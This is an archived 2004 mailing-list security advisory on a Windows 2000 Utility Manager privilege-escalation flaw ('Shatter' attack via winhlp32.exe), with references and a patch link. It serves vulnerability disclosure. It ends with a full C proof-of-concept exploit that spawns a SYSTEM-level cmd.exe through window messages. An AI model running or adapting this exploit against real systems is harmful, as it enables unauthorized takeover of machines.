[VulnWatch] [SHATTER Team Security Alert] Microsoft Windows Utility Manager Vulnerability

From: Vivek Rathod (Application Security, Inc.) (vrathod@private)
Date: Thu Apr 15 2004 - 08:45:52 PDT

Next message: spiffomatic 64: "[VulnWatch] SCT javascript execution vulnerability"

Previous message: by way of NSFOCUS Security Team: "[VulnWatch] NSFOCUS SA2004-01 : DoS Vulnerability in Microsoft Windows SPNEGO Protocol Decoding"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Microsoft Windows Utility Manager Vulnerability

April 13, 2004

Risk Level: High

Summary:
A local elevation of privileges vulnerability exists on the Windows Utility
Manager that allows to any user to take complete control over the operating
system.

Versions Affected:
All products in the Windows 2000 operating system family.

Details:
Microsoft Windows 2000 contains support for Accessibility options within 
the
operating system. Accessibility support is a series of assistive 
technologies
within Windows that allow users with disabilities to still be able to 
access the
functions of the operating system. Accessibility support is enabled or 
disabled
through shortcuts built into the operating system, or through the 
Accessibility
Utility Manager. The Utility Manager is an accessibility utility that 
allows
users to check the status of Accessibility programs (Magnifier, 
Narrator, On-
Screen Keyboard) and start or stop them. The Utility Manager can be 
invoked by
pressing Windows Key + U or executing "utilman.exe /start" from the command
line. The Utility Manager Service is enabled by default and runs in the
interactive desktop with Local System privileges.

The Utility Manager has support for context sensitive help. Users can 
access
this by clicking in the "?" on the title bar and then on an object or by
pressing the F1 key after selecting an object. In order to display the 
help,
Utility Manager loads winhlp32.exe but does not drop System privileges.
Therefore, winhlp32.exe is executed under the Local System account. While
winhlp32.exe is executing it is possible to send Windows messages to it and
attack it with "Shatter" style attacks.

Winhlp32.exe is executed with its main window hidden but it is very 
trivial to
make it visible. Once the window is made visible, a typical attack would
involve using the “File Open” dialog to execute a program such as 
“cmd.exe.”
Since the Help window has Local System privileges, the executed program 
will
have the same privileges.

Further information is available at:
http://www.appsecinc.com/resources/alerts/general/04-0001.html
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0908
http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx

Fix:
http://www.microsoft.com/downloads/details.aspx?FamilyId=0692C27E-F63A-414C-B3EB-D2342FBB6C00&displaylang=en

Acknowledgments:
Thanks to Cesar Cerrudo and Esteban Martinez Fayo of Application 
Security, Inc. (http://www.appsecinc.com) and to
Brett Moore of Security-Assessment.com (http://security-assessment.com).

Please find the proof-of-concept exploit code attached

___________________________________________
AppSecInc Team SHATTER
Tel: 1-866-927-7732
E-mail: shatter@private
Web: www.appsecinc.com

Application Security, Inc.
"Securing Business by Securing Enterprise Applications"



// By Cesar Cerrudo (cesar@private)
// Local elevation of priviliges exploit for Windows Utility Manager
// Gives you a shell with system privileges
// If you have problems try changing Sleep() values.

#include <stdio.h> 
#include <windows.h> 
#include <commctrl.h>
#include <Winuser.h>

int main(int argc, char *argv[]) 
{ 
  HWND lHandle, lHandle2;
  POINT point;

  char sText[]="%windir%\\system32\\cmd.ex?";

  // run utility manager
  system("utilman.exe /start");
  Sleep(500);

  // execute contextual help
  SendMessage(FindWindow(NULL, "Utility manager"), 0x4D, 0, 0);
  Sleep(500);

  // open file open dialog windown in Windows Help
  PostMessage(FindWindow(NULL, "Windows Help"), WM_COMMAND, 0x44D, 0);
  Sleep(500);

  // find open file dialog window
  lHandle = FindWindow("#32770","Open");

  // get input box handle
  lHandle2 = GetDlgItem(lHandle, 0x47C);
  Sleep(500);

  // set text to filter listview to display only cmd.exe
  SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
  Sleep(800);

  // send return
  SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);

  //get navigation bar handle
  lHandle2 = GetDlgItem(lHandle, 0x4A0);
  //send tab
  SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
  Sleep(500);
  lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
  //get list view handle
  lHandle2 = GetDlgItem(lHandle2, 0x1);

  SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0); // send "c" char
  SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0); // send "m" char
  SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0); // send "d" char
  Sleep(500);
  
  // popup context menu
  PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
  Sleep(1000);

  // get context menu handle
  point.x =10; point.y =30;
  lHandle2=WindowFromPoint(point);

  SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);   // move down in menu
  SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);   // move down in menu
  SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0); // send return

  SendMessage (lHandle, WM_CLOSE,0,0); // close open file dialog window

  return(0);
}

Next message: spiffomatic 64: "[VulnWatch] SCT javascript execution vulnerability"
Previous message: by way of NSFOCUS Security Team: "[VulnWatch] NSFOCUS SA2004-01 : DoS Vulnerability in Microsoft Windows SPNEGO Protocol Decoding"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Apr 15 2004 - 09:34:22 PDT